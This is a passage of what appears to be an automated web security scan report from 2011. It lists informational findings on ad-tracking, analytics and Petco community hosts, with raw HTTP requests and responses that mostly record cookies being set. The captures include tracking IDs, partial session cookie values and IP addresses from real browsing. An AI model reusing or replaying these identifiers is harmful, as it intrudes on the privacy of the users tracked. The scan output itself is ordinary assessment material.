GET /is/tag.contextweb.com?U= Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-3389AF6B211 |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://tag.contextweb.com Expires: Mon, 16 May 2011 01:19:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:19:51 GMT Connection: close Set-Cookie: 01AI=2-2-8AFA4574C23 P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://ak1.abmr.net |
Path: | /is/www.imiclk.com |
GET /is/www.imiclk.com?U=/cgi Host: ak1.abmr.net Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 01AI=2-2-C76F5B44DF8 |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.imiclk.com/cgi Expires: Mon, 16 May 2011 01:42:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:42:58 GMT Connection: close Set-Cookie: 01AI=2-2-5E66A717ADC P3P: policyref="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://analytics |
Path: | /analytics/v2/image.svc |
GET /analytics/v2/image.svc Host: analytics.apnewsregistry Proxy-Connection: keep-alive Referer: http://www.observertoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 303 See Other Cache-Control: private Date: Mon, 16 May 2011 01:19:41 GMT Location: http://d503lhn9b3612 P3P: CP="NOI PSAo OUR IND COM NAV STA" Server: Microsoft-IIS/7.0 Set-Cookie: uciv1=2ec34539-fad4-4d8a X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 0 Connection: keep-alive |
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /b |
GET /b?c1=2&c2=6035753&rn Host: b.scorecardresearch.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: UID=7278cea-24.143.206.58 |
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 15 May 2011 21:31:00 GMT Connection: close Set-Cookie: UID=7278cea-24.143.206.58 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS |
Severity: | Information |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /r |
GET /r?c2=6035140&d.c=gif&d.o Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=64dfc632-184.84.247 |
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Mon, 16 May 2011 01:20:47 GMT Connection: close Set-Cookie: UID=64dfc632-184.84.247 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /bh/rtset |
GET /bh/rtset?do=add&pid Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://d.xp1.ru4.com/meta User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 CW-Server: cw-web83 Cache-Control: no-cache, no-store Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Thu, 10-May-2012 01:19:51 GMT; Path=/ Set-Cookie: pb_rtb_ev=1:531292.AG Content-Type: image/gif Date: Mon, 16 May 2011 01:19:50 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49 GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /utils/ecSet.js |
GET /utils/ecSet.js?v=PI Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.observertoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=lYrOTcGt89Yz |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1 Content-Type: application/x-javascript Set-Cookie: PI=h1145373Za940831Z ETag: "637af42d-1f5-47f291 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=6912 Date: Mon, 16 May 2011 01:30:23 GMT Connection: close |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.petco |
Path: | /discussions/Bird |
GET /discussions/Bird Host: community.petco.com Proxy-Connection: keep-alive Referer: http://www.petco.com/?AID User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MP=CJ=1&CJExpiry=6/19 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:43:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Served: DC2WEB002 5/15/2011 9:43:42 PM, 0 wait X-Delphi: no Set-Cookie: ChameleonForumId10166 Cache-Control: private Expires: Mon, 16 May 2011 01:43:41 GMT Content-Type: text/javascript; charset=utf-8 Content-Length: 2407 ... if(TempestNS.WIDGETM ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.petco |
Path: | /discussions/Cat |
GET /discussions/Cat Host: community.petco.com Proxy-Connection: keep-alive Referer: http://www.petco.com/?AID User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MP=CJ=1&CJExpiry=6/19 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:43:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Served: DC2WEB030 5/15/2011 9:43:41 PM, 0 wait X-Delphi: no Set-Cookie: ChameleonForumId10166 Cache-Control: private Expires: Mon, 16 May 2011 01:43:40 GMT Content-Type: text/javascript; charset=utf-8 Content-Length: 2372 ... if(TempestNS.WIDGETM ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.petco |
Path: | /discussions/Dog |
GET /discussions/Dog Host: community.petco.com Proxy-Connection: keep-alive Referer: http://www.petco.com/?AID User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MP=CJ=1&CJExpiry=6/19 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:43:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Served: DC2WEB001 5/15/2011 9:43:41 PM, 65 wait X-Delphi: no Set-Cookie: ChameleonForumId10166 Cache-Control: private Expires: Mon, 16 May 2011 01:43:40 GMT Content-Type: text/javascript; charset=utf-8 Content-Length: 2593 ... if(TempestNS.WIDGETM ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.petco |
Path: | /discussions/Ferret |
GET /discussions/Ferret Host: community.petco.com Proxy-Connection: keep-alive Referer: http://www.petco.com/?AID User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MP=CJ=1&CJExpiry=6/19 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:43:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Served: DC2WEB002 5/15/2011 9:43:41 PM, 0 wait X-Delphi: no Set-Cookie: ChameleonForumId10166 Cache-Control: private Expires: Mon, 16 May 2011 01:43:40 GMT Content-Type: text/javascript; charset=utf-8 Content-Length: 2362 ... if(TempestNS.WIDGETM ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.petco |
Path: | /discussions/Fish |
GET /discussions/Fish Host: community.petco.com Proxy-Connection: keep-alive Referer: http://www.petco.com/?AID User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MP=CJ=1&CJExpiry=6/19 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:43:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Served: DC2WEB002 5/15/2011 9:43:41 PM, 0 wait X-Delphi: no Set-Cookie: ChameleonForumId10166 Cache-Control: private Expires: Mon, 16 May 2011 01:43:40 GMT Content-Type: text/javascript; charset=utf-8 Content-Length: 2495 ... if(TempestNS.WIDGETM ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.petco |
Path: | /discussions/Reptile |
GET /discussions/Reptile Host: community.petco.com Proxy-Connection: keep-alive Referer: http://www.petco.com/?AID User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MP=CJ=1&CJExpiry=6/19 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:43:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Served: DC2WEB002 5/15/2011 9:43:42 PM, 0 wait X-Delphi: no Set-Cookie: ChameleonForumId10166 Cache-Control: private Expires: Mon, 16 May 2011 01:43:41 GMT Content-Type: text/javascript; charset=utf-8 Content-Length: 2532 ... if(TempestNS.WIDGETM ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.petco |
Path: | /discussions/Small_Animal |
GET /discussions/Small_Animal Host: community.petco.com Proxy-Connection: keep-alive Referer: http://www.petco.com/?AID User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MP=CJ=1&CJExpiry=6/19 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:43:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Served: DC2WEB001 5/15/2011 9:43:41 PM, 28 wait X-Delphi: no Set-Cookie: ChameleonForumId10166 Cache-Control: private Expires: Mon, 16 May 2011 01:43:40 GMT Content-Type: text/javascript; charset=utf-8 Content-Length: 2525 ... if(TempestNS.WIDGETM ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.petco |
Path: | /discussions/Social |
GET /discussions/Social Host: community.petco.com Proxy-Connection: keep-alive Referer: http://www.petco.com/?AID User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MP=CJ=1&CJExpiry=6/19 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:43:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Served: DC2WEB030 5/15/2011 9:43:41 PM, 0 wait X-Delphi: no Set-Cookie: ChameleonForumId10166 Cache-Control: private Expires: Mon, 16 May 2011 01:43:40 GMT Content-Type: text/javascript; charset=utf-8 Content-Length: 2844 ... if(TempestNS.WIDGETM ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.petco |
Path: | /n/blogs/blog.aspx |
GET /n/blogs/blog.aspx?webtag Host: community.petco.com Proxy-Connection: keep-alive Referer: http://www.petco.com/?AID User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MP=CJ=1&CJExpiry=6/19 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:43:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Served: DC2WEB030 5/15/2011 9:43:29 PM, 2 wait X-Delphi: no Set-Cookie: ChameleonForumId10166 Cache-Control: private Expires: Mon, 16 May 2011 01:43:28 GMT Content-Type: text/javascript; charset=utf-8 Content-Length: 2784 ... if(TempestNS.WIDGETM ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://community.petco |
Path: | /n/pfx/forum.aspx |
GET /n/pfx/forum.aspx?webtag Host: community.petco.com Proxy-Connection: keep-alive Referer: http://www.petco.com/?AID User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: MP=CJ=1&CJExpiry=6/19 |
HTTP/1.1 301 Page has permanently moved Connection: close Date: Mon, 16 May 2011 01:43:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Location: /discussions/Cat Set-Cookie: ChameleonForumId10166 Cache-Control: private Content-Type: text/html |
Severity: | Information |
Confidence: | Certain |
Host: | http://contextweb-match |
Path: | / |
GET / HTTP/1.1 Host: contextweb-match.dotomi Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 204 No Content Date: Mon, 16 May 2011 01:20:04 GMT X-Name: rtb-s08 Set-Cookie: Apache=173.193.214.243 Cache-Control: max-age=0, no-store Content-Length: 0 Connection: close Content-Type: text/plain |
Severity: | Information |
Confidence: | Certain |
Host: | http://ctix8.cheaptickets |
Path: | /dcssufut800000w4l0d |
GET /dcssufut800000w4l0d Host: ctix8.cheaptickets.com Proxy-Connection: keep-alive Referer: http://www.orbitz.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:22:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ACOOKIE=C8ctADE3My4x P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Pragma: no-cache Expires: -1 Cache-Control: no-cache Content-type: image/gif Content-Length: 67 GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://cw-m.d.chango.com |
Path: | /m/cw |
GET /m/cw HTTP/1.1 Host: cw-m.d.chango.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Content-Length: 0 Server: Chango RTB Server Location: http://bh.contextweb.com Pragma: no-cache Cache-Control: no-cache, no-store, max-age=0, must-revalidate P3P: policyref="http://as Content-Type: text/html; charset=UTF-8 Set-Cookie: _t=9ed3f2f2-7f5a-11e0 Set-Cookie: _i_cw=1; Domain=chango.com; expires=Thu, 30 Jun 2011 01:20:00 GMT; Path=/ Connection: close |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.audienceiq.com |
Path: | /r/dm/mkt/44/mpid//mpuid |
GET /r/dm/mkt/44/mpid//mpuid Host: d.audienceiq.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3133143063234146036; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:11 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.audienceiq.com |
Path: | /r/dm/mkt/73/mpid//mpuid |
GET /r/dm/mkt/73/mpid//mpuid Host: d.audienceiq.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=7367907040977902081; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:12 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.audienceiq.com |
Path: | /r/du/id/L2NzaWQvNS9 |
GET /r/du/id/L2NzaWQvNS9 Host: d.audienceiq.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3598886902647137246; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:11 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.mediabrandsww |
Path: | /r/dm/mkt/3/mpid//mpuid |
GET /r/dm/mkt/3/mpid//mpuid Host: d.mediabrandsww.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=2614175914018475511; Domain=.mediabrandsww.com Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:12 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.p-td.com |
Path: | /r/dm/mkt/4/mpid//mpuid |
GET /r/dm/mkt/4/mpid//mpuid Host: d.p-td.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=8496530639253255806 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=8496530639253255806; Domain=.p-td.com; Expires=Sat, 12-Nov-2011 01:20:26 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:26 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.p-td.com |
Path: | /r/dm/mkt/4/mpid//mpuid |
GET /r/dm/mkt/4/mpid//mpuid Host: d.p-td.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=8496530639253255806; Domain=.p-td.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:07 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://d.turn.com |
Path: | /r/dd/id/L2NzaWQvMS9 |
GET /r/dd/id/L2NzaWQvMS9 Host: d.turn.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:20:13 GMT; Path=/ Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:20:13 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:13 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://data.adsrvr.org |
Path: | /map/cookie/contextweb |
GET /map/cookie/contextweb HTTP/1.1 Host: data.adsrvr.org Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TDID=d7aeb157-aa7f-4dc8 |
HTTP/1.1 302 Found Cache-Control: private,no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=utf-8 Location: http://bh.contextweb.com Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: TDID=d7aeb157-aa7f-4dc8 P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV" Date: Mon, 16 May 2011 01:26:10 GMT Content-Length: 213 Redirecting to: <a href="http://bh ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://disneycruise |
Path: | /reservations/customize |
